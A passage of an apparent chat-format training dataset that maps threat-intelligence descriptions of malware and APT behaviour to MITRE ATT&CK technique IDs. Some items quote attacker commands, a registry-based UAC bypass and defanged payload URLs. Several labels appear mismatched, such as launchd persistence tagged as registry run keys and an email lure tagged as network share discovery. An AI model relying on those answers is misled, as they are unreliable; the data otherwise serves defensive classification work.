- "content": "Zebrocy stores all collected information in a single file before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore can modify the victim's anti-virus."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers"
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery', 'T1033 - System Owner/User Discovery', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has the ability to distinguish between a standard user and an administrator on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type has uploaded data and files from a compromised host to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collected the victim username and whether it was running as admin, then sent the information to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has used DLL side-loading to execute its payload."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOBELIUM, with existing administrative permissions, was observed to drop a malicious loader named version.dll in the %WinDir%\\ADFS\\ folder where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located. Once the system or the AD FS service is restarted, Microsoft.IdentityServer.ServiceHost.exe loads mscoree.dll, which in turn loads mscoreei.dll. As mentioned above, mscoreei.dll has a delay load import named version.dll"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Specifically, the following GitHub repositories appear to be controlled by the MuddyWater threat actor(s): [unknown SHA256] Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/ArabicBrowserFont.exe [unknown SHA256] Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/FontArabic.exe 9b5e36bb7518a9e333c31d09b589102f89e3425571dd434820ab3c437dc4e0d9 (and several others) Downloads payload from: hxxps://raw.githubusercontent[.]com/ReactDeveloper2017/react/master/src/test/test.js Interestingly, both profiles were populated with forked repositories to give them an air of legitimacy as shown in figure 2"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 can use Invoke-RunAs to make tokens."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty establishes persistence by creating a scheduled task with the command \"SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“\"."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack’s can download and upload a file to the victim’s computer."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Every time the malware runs a command using cmd.exe, the standard output (STDOUT) of the executed command is piped and written to a Google Drive account with the following filename format"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following successful infiltration, the malware persists through registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run The command line execution leads to PowerShell code executed from a different registry value ."
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT has the ability to collect the username from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can enumerate files on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro contains malicious code that attempts to download content from a remote server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch searches for files with specific file extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads an executable and injects it directly into a new process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used ipconfig, Ping, and \"tracert\" to enumerate the IP address and network environment and settings of the local host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy gathers the current time zone and date information from the system."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "!DWN Downloads a file from a specified URL"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has stolen copies of the Active Directory database (NTDS.DIT)."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris is a backdoor written in Go whose role is to continuously query its C2 server for executables to download and execute on the victim system. Before performing any operations, it sleeps for at least nine minutes in a possible attempt to defeat sandbox-based analysis systems"
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShell Script “58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “Documents,” “Downloads,” “Desktop,” and “Pictures” folders of every user are checked. The DLL file also examines drives other than C"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hikit has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component."
- },
- {
- "role": "assistant",
- "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used JS scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can inject itself into running processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke has been packed with multiple layers of encryption."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D has a command to delete a file from the system. OSX_OCEANLOTUS.D deletes the app bundle and dropper after execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used NBTscan and custom tools to discover remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can initiate a port scan against a given IP address."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Andariel has used the \"netstat -naop tcp\" command to display TCP connections on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "network loader encrypts C2 traffic with RSA and RC6."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "L“ServicesActive”: This string is passed to the OpenSCManagerW API to retrieve active services. expand 32-byte kexpand 16-byte”: The constants used by the Salsa20 symmetric encryption algorithm"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has collected the Service Pack, language, and region information to send to the C2."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol has Base64 encoded the RSA public key used for encrypting files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyZBot can disable Avira anti-virus."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar adds a .lnk file to the Windows startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can download additional files onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader searches for files named logins.json to parse for credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has deleted tmp and prefetch files during post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2: Excerpt of an APT33 malicious .hta file We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can suppress UAC prompts by setting the \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" registry key on Windows 10 or \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" on Windows 7 and launching the \"eventvwr.msc\" process, which launches BitPaymer with elevated privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has used a simple remote shell tool that will call back to the C2 server and wait for commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval."
- },
- {
- "role": "assistant",
- "content": "T1621 - Multi-Factor Authentication Request Generation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spearphishing Attachment (ATT&CK T1193) is one of the most used Initial Access techniques used by ransomware families as in Sodinokibi. Attackers use spam emails with an attached MS Office Word document including a malicious macro to download the ransomware to the target system. In order to show the lifecycle of Sodinokibi ransomware, we analyzed a Microsoft Word document. Sodinokibi is a “Ransomware-as-a-Service (RAAS) malware, so its distribution methods vary depending on the attacker distributing it"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Lizar server application, meanwhile, is written using the .NET framework and runs on a remote Linux host, researchers said. It supports encrypted communications with the bot client"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials."
- },
- {
- "role": "assistant",
- "content": "T1187 - Forced Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\\ drive."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "High resolution screenshots of specified process windows and when recording VoiceIP application audio"
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use HTTP and DNS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1140 - Deobfuscate/Decode Files or Information', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The RunAtLoad key will command launchd to run the daemon when the operating system starts up, while the KeepAlive key will command launchd to let the process run indefinitely"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stolen code signing certificates used to sign malware"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has checked for the presence of antivirus software with \"powershell Get-CimInstance -Namespace root/securityCenter2 – classname antivirusproduct\"."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has registered fraudulent domains such as \"mail-newyorker.com\" and \"news12.com.recover-session-service.site\" to target specific victims with phishing attacks."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SslMM has a hard-coded primary and backup C2 string."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in Prikormka gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake. The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as seen in the example GET request"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has the ability to delete a specified file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can write its configuration file to \"Software\\Classes\\scConfig\" in either \"HKEY_LOCAL_MACHINE\" or \"HKEY_CURRENT_USER\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bonadan can find the external IP address of the infected host."
